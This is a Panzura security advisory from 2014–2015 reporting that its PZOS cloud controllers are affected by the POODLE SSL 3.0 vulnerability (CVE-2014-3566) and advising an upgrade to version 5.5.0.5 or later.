Panzura Security Advisory PZOS-2014-005

Issue Date: 10/27/2014
Updated Date: 02/25/2015
Title: SSL is vulnerable to man-in-the-middle attack, AKA “POODLE”
Classification: Medium
Status: Closed
Affected Products: PZOS 5.5.0.4 and earlier

Summary

The NIST National Cyber Awareness System announced a vulnerability discovered in the SSL protocol 3.0. Additional information is available in CVE-2014-3566 available here: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3566

Details

As noted at the above URL:

“The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the “POODLE” issue.”

Panzura technical staff has conducted a thorough review of the PZOS code base and concluded Panzura Cloud Controllers are susceptible to this vulnerability because we support SSL version 3 for both our WebUI management interface and to transport traffic through our Cloud Connectors. A fix has been developed, is undergoing QA, and should be available in an upcoming software release within the next 6 weeks.

Resolution

Upgrade the Panzura software to PZOS version 5.5.0.5 or higher; any future major or minor releases will also correct the issue. Release notes for this version will outline details as necessary for this correction.
Back to Advisories List